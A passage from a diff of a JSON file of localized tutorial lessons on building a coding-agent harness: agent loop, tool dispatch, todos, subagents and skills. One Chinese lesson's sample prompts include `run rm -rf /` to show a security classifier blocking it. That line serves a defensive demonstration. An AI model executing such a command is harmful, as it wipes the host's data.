| \"这个命令的意图是什么?\" | s14 |\n| 权限 | \"这个意图被允许吗?\" | s13 |\n| 执行 | \"执行并返回结果\" | s02 + s16 |\n\n## 工作原理\n\n1. `execute_tool()` 对每次工具调用运行 5 层管线。\n\n2. 每层独立 -- 移除任何一层,其他层不受影响。\n\n3. REPL 命令: `/security`, `/hooks`, `/mcp`, `/audit`。\n\n## 相对 s16 的变更\n\n| 组件 | 之前 (s13-s16 独立) | 之后 (s17) |\n|------|-------------------|-----------|\n| 安全管线 | 各章独立运行 | 统一 `execute_tool` 管线 |\n| 分类器 | 独立运行 | 嵌入 Hook -> Classify -> Permission 流程 |\n| Hooks | 独立运行 | 作为管线第一层和最后一层 |\n| MCP | 独立运行 | 作为管线执行层的一部分 |\n\n## 试一试\n\n```sh\ncd learn-claude-code\npython agents/s17_secure_extension_harness.py\n```\n\n1. `list all python files` (所有层通过 -> allow)\n2. `run rm -rf /` (分类器拒绝 -> 被拦截)\n3. `write a test file and show audit log` (PostToolUse hook 记录 -> `/audit`)\n4. `search for 'PermissionGuard' via MCP` (MCP 工具通过管线调用)\n5. `register a hook that blocks all pip commands` (动态 hook 注册)\n" }, { "version": "s01", "locale": "ja", "title": "s01: The Agent Loop", - "content": "# s01: The Agent Loop\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- 1つのツール + 1つのループ = エージェント。\n\n## 問題\n\n言語モデルはコードについて推論できるが、現実世界に触れられない。ファイルを読めず、テストを実行できず、エラーを確認できない。ループがなければ、ツール呼び出しのたびにユーザーが手動で結果をコピーペーストする必要がある。つまりユーザー自身がループになる。\n\n## 解決策\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\n1つの終了条件がフロー全体を制御する。モデルがツール呼び出しを止めるまでループが回り続ける。\n\n## 仕組み\n\n1. ユーザーのプロンプトが最初のメッセージになる。\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. メッセージとツール定義をLLMに送信する。\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. アシスタントのレスポンスを追加し、`stop_reason`を確認する。ツールが呼ばれなければ終了。\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. 各ツール呼び出しを実行し、結果を収集してuserメッセージとして追加。ステップ2に戻る。\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\n1つの関数にまとめると:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\nこれでエージェント全体が30行未満に収まる。本コースの残りはすべてこのループの上に積み重なる -- ループ自体は変わらない。\n\n## 変更点\n\n| Component | Before | After |\n|---------------|------------|--------------------------------|\n| Agent loop | (none) | `while True` + stop_reason |\n| Tools | (none) | `bash` (one tool) |\n| Messages | (none) | Accumulating list |\n| Control flow | (none) | `stop_reason != \"tool_use\"` |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" + "content": "# s01: The Agent Loop\n\n`[ s01 ] s02 > s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"One loop & Bash is all you need\"* -- 1つのツール + 1つのループ = エージェント。\n>\n> **Harness 層**: ループ -- モデルと現実世界を繋ぐ最初の接点。\n\n## 問題\n\n言語モデルはコードについて推論できるが、現実世界に触れられない。ファイルを読めず、テストを実行できず、エラーを確認できない。ループがなければ、ツール呼び出しのたびにユーザーが手動で結果をコピーペーストする必要がある。つまりユーザー自身がループになる。\n\n## 解決策\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tool |\n| prompt | | | | execute |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n (loop until stop_reason != \"tool_use\")\n```\n\n1つの終了条件がフロー全体を制御する。モデルがツール呼び出しを止めるまでループが回り続ける。\n\n## 仕組み\n\n1. ユーザーのプロンプトが最初のメッセージになる。\n\n```python\nmessages.append({\"role\": \"user\", \"content\": query})\n```\n\n2. メッセージとツール定義をLLMに送信する。\n\n```python\nresponse = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n)\n```\n\n3. アシスタントのレスポンスを追加し、`stop_reason`を確認する。ツールが呼ばれなければ終了。\n\n```python\nmessages.append({\"role\": \"assistant\", \"content\": response.content})\nif response.stop_reason != \"tool_use\":\n return\n```\n\n4. 各ツール呼び出しを実行し、結果を収集してuserメッセージとして追加。ステップ2に戻る。\n\n```python\nresults = []\nfor block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\nmessages.append({\"role\": \"user\", \"content\": results})\n```\n\n1つの関数にまとめると:\n\n```python\ndef agent_loop(query):\n messages = [{\"role\": \"user\", \"content\": query}]\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n\n if response.stop_reason != \"tool_use\":\n return\n\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n output = run_bash(block.input[\"command\"])\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n messages.append({\"role\": \"user\", \"content\": results})\n```\n\nこれでエージェント全体が30行未満に収まる。本コースの残りはすべてこのループの上に積み重なる -- ループ自体は変わらない。\n\n## 変更点\n\n| Component | Before | After |\n|---------------|------------|--------------------------------|\n| Agent loop | (none) | `while True` + stop_reason |\n| Tools | (none) | `bash` (one tool) |\n| Messages | (none) | Accumulating list |\n| Control flow | (none) | `stop_reason != \"tool_use\"` |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s01_agent_loop.py\n```\n\n1. `Create a file called hello.py that prints \"Hello, World!\"`\n2. `List all Python files in this directory`\n3. `What is the current git branch?`\n4. `Create a directory called test_output and write 3 files in it`\n" }, { "version": "s02", "locale": "ja", "title": "s02: Tool Use", - "content": "# s02: Tool Use\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"ツールを足すなら、ハンドラーを1つ足すだけ\"* -- ループは変わらない。新ツールは dispatch map に登録するだけ。\n\n## 問題\n\n`bash`だけでは、エージェントは何でもシェル経由で行う。`cat`は予測不能に切り詰め、`sed`は特殊文字で壊れ、すべてのbash呼び出しが制約のないセキュリティ面になる。`read_file`や`write_file`のような専用ツールなら、ツールレベルでパスのサンドボックス化を強制できる。\n\n重要な点: ツールを追加してもループの変更は不要。\n\n## 解決策\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## 仕組み\n\n1. 各ツールにハンドラ関数を定義する。パスのサンドボックス化でワークスペース外への脱出を防ぐ。\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. ディスパッチマップがツール名とハンドラを結びつける。\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. ループ内で名前によりハンドラをルックアップする。ループ本体はs01から不変。\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\nツール追加 = ハンドラ追加 + スキーマ追加。ループは決して変わらない。\n\n## s01からの変更点\n\n| Component | Before (s01) | After (s02) |\n|----------------|--------------------|----------------------------|\n| Tools | 1 (bash only) | 4 (bash, read, write, edit)|\n| Dispatch | Hardcoded bash call | `TOOL_HANDLERS` dict |\n| Path safety | None | `safe_path()` sandbox |\n| Agent loop | Unchanged | Unchanged |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" + "content": "# s02: Tool Use\n\n`s01 > [ s02 ] s03 > s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"ツールを足すなら、ハンドラーを1つ足すだけ\"* -- ループは変わらない。新ツールは dispatch map に登録するだけ。\n>\n> **Harness 層**: ツール分配 -- モデルが届く範囲を広げる。\n\n## 問題\n\n`bash`だけでは、エージェントは何でもシェル経由で行う。`cat`は予測不能に切り詰め、`sed`は特殊文字で壊れ、すべてのbash呼び出しが制約のないセキュリティ面になる。`read_file`や`write_file`のような専用ツールなら、ツールレベルでパスのサンドボックス化を強制できる。\n\n重要な点: ツールを追加してもループの変更は不要。\n\n## 解決策\n\n```\n+--------+ +-------+ +------------------+\n| User | ---> | LLM | ---> | Tool Dispatch |\n| prompt | | | | { |\n+--------+ +---+---+ | bash: run_bash |\n ^ | read: run_read |\n | | write: run_wr |\n +-----------+ edit: run_edit |\n tool_result | } |\n +------------------+\n\nThe dispatch map is a dict: {tool_name: handler_function}.\nOne lookup replaces any if/elif chain.\n```\n\n## 仕組み\n\n1. 各ツールにハンドラ関数を定義する。パスのサンドボックス化でワークスペース外への脱出を防ぐ。\n\n```python\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\ndef run_read(path: str, limit: int = None) -> str:\n text = safe_path(path).read_text()\n lines = text.splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit]\n return \"\\n\".join(lines)[:50000]\n```\n\n2. ディスパッチマップがツール名とハンドラを結びつける。\n\n```python\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"],\n kw[\"new_text\"]),\n}\n```\n\n3. ループ内で名前によりハンドラをルックアップする。ループ本体はs01から不変。\n\n```python\nfor block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input) if handler \\\n else f\"Unknown tool: {block.name}\"\n results.append({\n \"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": output,\n })\n```\n\nツール追加 = ハンドラ追加 + スキーマ追加。ループは決して変わらない。\n\n## s01からの変更点\n\n| Component | Before (s01) | After (s02) |\n|----------------|--------------------|----------------------------|\n| Tools | 1 (bash only) | 4 (bash, read, write, edit)|\n| Dispatch | Hardcoded bash call | `TOOL_HANDLERS` dict |\n| Path safety | None | `safe_path()` sandbox |\n| Agent loop | Unchanged | Unchanged |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s02_tool_use.py\n```\n\n1. `Read the file requirements.txt`\n2. `Create a file called greet.py with a greet(name) function`\n3. `Edit greet.py to add a docstring to the function`\n4. `Read greet.py to verify the edit worked`\n" }, { "version": "s03", "locale": "ja", "title": "s03: TodoWrite", - "content": "# s03: TodoWrite\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"計画のないエージェントは行き当たりばったり\"* -- まずステップを書き出し、それから実行。\n\n## 問題\n\nマルチステップのタスクで、モデルは途中で迷子になる。作業を繰り返したり、ステップを飛ばしたり、脱線したりする。長い会話になるほど悪化する -- ツール結果がコンテキストを埋めるにつれ、システムプロンプトの影響力が薄れる。10ステップのリファクタリングでステップ1-3を完了した後、残りを忘れて即興を始めてしまう。\n\n## 解決策\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## 仕組み\n\n1. TodoManagerはアイテムのリストをステータス付きで保持する。`in_progress`にできるのは同時に1つだけ。\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. `todo`ツールは他のツールと同様にディスパッチマップに追加される。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. nagリマインダーが、モデルが3ラウンド以上`todo`を呼ばなかった場合にナッジを注入する。\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\n「一度にin_progressは1つだけ」の制約が逐次的な集中を強制し、nagリマインダーが説明責任を生む。\n\n## s02からの変更点\n\n| Component | Before (s02) | After (s03) |\n|----------------|------------------|----------------------------|\n| Tools | 4 | 5 (+todo) |\n| Planning | None | TodoManager with statuses |\n| Nag injection | None | `` after 3 rounds|\n| Agent loop | Simple dispatch | + rounds_since_todo counter|\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" + "content": "# s03: TodoWrite\n\n`s01 > s02 > [ s03 ] s04 > s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"計画のないエージェントは行き当たりばったり\"* -- まずステップを書き出し、それから実行。\n>\n> **Harness 層**: 計画 -- 航路を描かずにモデルを軌道に乗せる。\n\n## 問題\n\nマルチステップのタスクで、モデルは途中で迷子になる。作業を繰り返したり、ステップを飛ばしたり、脱線したりする。長い会話になるほど悪化する -- ツール結果がコンテキストを埋めるにつれ、システムプロンプトの影響力が薄れる。10ステップのリファクタリングでステップ1-3を完了した後、残りを忘れて即興を始めてしまう。\n\n## 解決策\n\n```\n+--------+ +-------+ +---------+\n| User | ---> | LLM | ---> | Tools |\n| prompt | | | | + todo |\n+--------+ +---+---+ +----+----+\n ^ |\n | tool_result |\n +----------------+\n |\n +-----------+-----------+\n | TodoManager state |\n | [ ] task A |\n | [>] task B <- doing |\n | [x] task C |\n +-----------------------+\n |\n if rounds_since_todo >= 3:\n inject into tool_result\n```\n\n## 仕組み\n\n1. TodoManagerはアイテムのリストをステータス付きで保持する。`in_progress`にできるのは同時に1つだけ。\n\n```python\nclass TodoManager:\n def update(self, items: list) -> str:\n validated, in_progress_count = [], 0\n for item in items:\n status = item.get(\"status\", \"pending\")\n if status == \"in_progress\":\n in_progress_count += 1\n validated.append({\"id\": item[\"id\"], \"text\": item[\"text\"],\n \"status\": status})\n if in_progress_count > 1:\n raise ValueError(\"Only one task can be in_progress\")\n self.items = validated\n return self.render()\n```\n\n2. `todo`ツールは他のツールと同様にディスパッチマップに追加される。\n\n```python\nTOOL_HANDLERS = {\n # ...base tools...\n \"todo\": lambda **kw: TODO.update(kw[\"items\"]),\n}\n```\n\n3. nagリマインダーが、モデルが3ラウンド以上`todo`を呼ばなかった場合にナッジを注入する。\n\n```python\nif rounds_since_todo >= 3 and messages:\n last = messages[-1]\n if last[\"role\"] == \"user\" and isinstance(last.get(\"content\"), list):\n last[\"content\"].insert(0, {\n \"type\": \"text\",\n \"text\": \"Update your todos.\",\n })\n```\n\n「一度にin_progressは1つだけ」の制約が逐次的な集中を強制し、nagリマインダーが説明責任を生む。\n\n## s02からの変更点\n\n| Component | Before (s02) | After (s03) |\n|----------------|------------------|----------------------------|\n| Tools | 4 | 5 (+todo) |\n| Planning | None | TodoManager with statuses |\n| Nag injection | None | `` after 3 rounds|\n| Agent loop | Simple dispatch | + rounds_since_todo counter|\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s03_todo_write.py\n```\n\n1. `Refactor the file hello.py: add type hints, docstrings, and a main guard`\n2. `Create a Python package with __init__.py, utils.py, and tests/test_utils.py`\n3. `Review all Python files and fix any style issues`\n" }, { "version": "s04", "locale": "ja", "title": "s04: Subagents", - "content": "# s04: Subagents\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを\"* -- サブエージェントは独立した messages[] を使い、メイン会話を汚さない。\n\n## 問題\n\nエージェントが作業するにつれ、messages配列は膨張し続ける。すべてのファイル読み取り、すべてのbash出力がコンテキストに永久に残る。「このプロジェクトはどのテストフレームワークを使っているか」という質問は5つのファイルを読む必要があるかもしれないが、親に必要なのは「pytest」という答えだけだ。\n\n## 解決策\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## 仕組み\n\n1. 親に`task`ツールを追加する。子は`task`を除くすべての基本ツールを取得する(再帰的な生成は不可)。\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. サブエージェントは`messages=[]`で開始し、自身のループを実行する。最終テキストだけが親に返る。\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\n子のメッセージ履歴全体(30回以上のツール呼び出し)は破棄される。親は1段落の要約を通常の`tool_result`として受け取る。\n\n## s03からの変更点\n\n| Component | Before (s03) | After (s04) |\n|----------------|------------------|---------------------------|\n| Tools | 5 | 5 (base) + task (parent) |\n| Context | Single shared | Parent + child isolation |\n| Subagent | None | `run_subagent()` function |\n| Return value | N/A | Summary text only |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" + "content": "# s04: Subagents\n\n`s01 > s02 > s03 > [ s04 ] s05 > s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"大きなタスクを分割し、各サブタスクにクリーンなコンテキストを\"* -- サブエージェントは独立した messages[] を使い、メイン会話を汚さない。\n>\n> **Harness 層**: コンテキスト隔離 -- モデルの思考の明晰さを守る。\n\n## 問題\n\nエージェントが作業するにつれ、messages配列は膨張し続ける。すべてのファイル読み取り、すべてのbash出力がコンテキストに永久に残る。「このプロジェクトはどのテストフレームワークを使っているか」という質問は5つのファイルを読む必要があるかもしれないが、親に必要なのは「pytest」という答えだけだ。\n\n## 解決策\n\n```\nParent agent Subagent\n+------------------+ +------------------+\n| messages=[...] | | messages=[] | <-- fresh\n| | dispatch | |\n| tool: task | ----------> | while tool_use: |\n| prompt=\"...\" | | call tools |\n| | summary | append results |\n| result = \"...\" | <---------- | return last text |\n+------------------+ +------------------+\n\nParent context stays clean. Subagent context is discarded.\n```\n\n## 仕組み\n\n1. 親に`task`ツールを追加する。子は`task`を除くすべての基本ツールを取得する(再帰的な生成は不可)。\n\n```python\nPARENT_TOOLS = CHILD_TOOLS + [\n {\"name\": \"task\",\n \"description\": \"Spawn a subagent with fresh context.\",\n \"input_schema\": {\n \"type\": \"object\",\n \"properties\": {\"prompt\": {\"type\": \"string\"}},\n \"required\": [\"prompt\"],\n }},\n]\n```\n\n2. サブエージェントは`messages=[]`で開始し、自身のループを実行する。最終テキストだけが親に返る。\n\n```python\ndef run_subagent(prompt: str) -> str:\n sub_messages = [{\"role\": \"user\", \"content\": prompt}]\n for _ in range(30): # safety limit\n response = client.messages.create(\n model=MODEL, system=SUBAGENT_SYSTEM,\n messages=sub_messages,\n tools=CHILD_TOOLS, max_tokens=8000,\n )\n sub_messages.append({\"role\": \"assistant\",\n \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n break\n results = []\n for block in response.content:\n if block.type == \"tool_use\":\n handler = TOOL_HANDLERS.get(block.name)\n output = handler(**block.input)\n results.append({\"type\": \"tool_result\",\n \"tool_use_id\": block.id,\n \"content\": str(output)[:50000]})\n sub_messages.append({\"role\": \"user\", \"content\": results})\n return \"\".join(\n b.text for b in response.content if hasattr(b, \"text\")\n ) or \"(no summary)\"\n```\n\n子のメッセージ履歴全体(30回以上のツール呼び出し)は破棄される。親は1段落の要約を通常の`tool_result`として受け取る。\n\n## s03からの変更点\n\n| Component | Before (s03) | After (s04) |\n|----------------|------------------|---------------------------|\n| Tools | 5 | 5 (base) + task (parent) |\n| Context | Single shared | Parent + child isolation |\n| Subagent | None | `run_subagent()` function |\n| Return value | N/A | Summary text only |\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s04_subagent.py\n```\n\n1. `Use a subtask to find what testing framework this project uses`\n2. `Delegate: read all .py files and summarize what each one does`\n3. `Use a task to create a new module, then verify it from here`\n" }, { "version": "s05", "locale": "ja", "title": "s05: Skills", - "content": "# s05: Skills\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"必要な知識を、必要な時に読み込む\"* -- system prompt ではなく tool_result で注入。\n\n## 問題\n\nエージェントにドメイン固有のワークフローを遵守させたい: gitの規約、テストパターン、コードレビューチェックリスト。すべてをシステムプロンプトに入れると、使われないスキルにトークンを浪費する。10スキル x 2000トークン = 20,000トークン、ほとんどが任意のタスクに無関係だ。\n\n## 解決策\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\n第1層: スキル*名*をシステムプロンプトに(低コスト)。第2層: スキル*本体*をtool_resultに(オンデマンド)。\n\n## 仕組み\n\n1. 各スキルは `SKILL.md` ファイルを含むディレクトリとして配置される。\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoaderが `SKILL.md` を再帰的に探索し、ディレクトリ名をスキル識別子として使用する。\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return f\"\\n{skill['body']}\\n\"\n```\n\n3. 第1層はシステムプロンプトに配置。第2層は通常のツールハンドラ。\n\n```python\nSYSTEM = f\"\"\"You are a coding agent at {WORKDIR}.\nSkills available:\n{SKILL_LOADER.get_descriptions()}\"\"\"\n\nTOOL_HANDLERS = {\n # ...base tools...\n \"load_skill\": lambda **kw: SKILL_LOADER.get_content(kw[\"name\"]),\n}\n```\n\nモデルはどのスキルが存在するかを知り(低コスト)、関連する時にだけ読み込む(高コスト)。\n\n## s04からの変更点\n\n| Component | Before (s04) | After (s05) |\n|----------------|------------------|----------------------------|\n| Tools | 5 (base + task) | 5 (base + load_skill) |\n| System prompt | Static string | + skill descriptions |\n| Knowledge | None | skills/\\*/SKILL.md files |\n| Injection | None | Two-layer (system + result)|\n\n## 試してみる\n\n```sh\ncd learn-claude-code\npython agents/s05_skill_loading.py\n```\n\n1. `What skills are available?`\n2. `Load the agent-builder skill and follow its instructions`\n3. `I need to do a code review -- load the relevant skill first`\n4. `Build an MCP server using the mcp-builder skill`\n" + "content": "# s05: Skills\n\n`s01 > s02 > s03 > s04 > [ s05 ] s06 | s07 > s08 > s09 > s10 > s11 > s12`\n\n> *\"必要な知識を、必要な時に読み込む\"* -- system prompt ではなく tool_result で注入。\n>\n> **Harness 層**: オンデマンド知識 -- モデルが求めた時だけ渡すドメイン専門性。\n\n## 問題\n\nエージェントにドメイン固有のワークフローを遵守させたい: gitの規約、テストパターン、コードレビューチェックリスト。すべてをシステムプロンプトに入れると、使われないスキルにトークンを浪費する。10スキル x 2000トークン = 20,000トークン、ほとんどが任意のタスクに無関係だ。\n\n## 解決策\n\n```\nSystem prompt (Layer 1 -- always present):\n+--------------------------------------+\n| You are a coding agent. |\n| Skills available: |\n| - git: Git workflow helpers | ~100 tokens/skill\n| - test: Testing best practices |\n+--------------------------------------+\n\nWhen model calls load_skill(\"git\"):\n+--------------------------------------+\n| tool_result (Layer 2 -- on demand): |\n| |\n| Full git workflow instructions... | ~2000 tokens\n| Step 1: ... |\n| |\n+--------------------------------------+\n```\n\n第1層: スキル*名*をシステムプロンプトに(低コスト)。第2層: スキル*本体*をtool_resultに(オンデマンド)。\n\n## 仕組み\n\n1. 各スキルは `SKILL.md` ファイルを含むディレクトリとして配置される。\n\n```\nskills/\n pdf/\n SKILL.md # ---\\n name: pdf\\n description: Process PDF files\\n ---\\n ...\n code-review/\n SKILL.md # ---\\n name: code-review\\n description: Review code\\n ---\\n ...\n```\n\n2. SkillLoaderが `SKILL.md` を再帰的に探索し、ディレクトリ名をスキル識別子として使用する。\n\n```python\nclass SkillLoader:\n def __init__(self, skills_dir: Path):\n self.skills = {}\n for f in sorted(skills_dir.rglob(\"SKILL.md\")):\n text = f.read_text()\n meta, body = self._parse_frontmatter(text)\n name = meta.get(\"name\", f.parent.name)\n self.skills[name] = {\"meta\": meta, \"body\": body}\n\n def get_descriptions(self) -> str:\n lines = []\n for name, skill in self.skills.items():\n desc = skill[\"meta\"].get(\"description\", \"\")\n lines.append(f\" - {name}: {desc}\")\n return \"\\n\".join(lines)\n\n def get_content(self, name: str) -> str:\n skill = self.skills.get(name)\n if not skill:\n return f\"Error: Unknown skill '{name}'.\"\n return 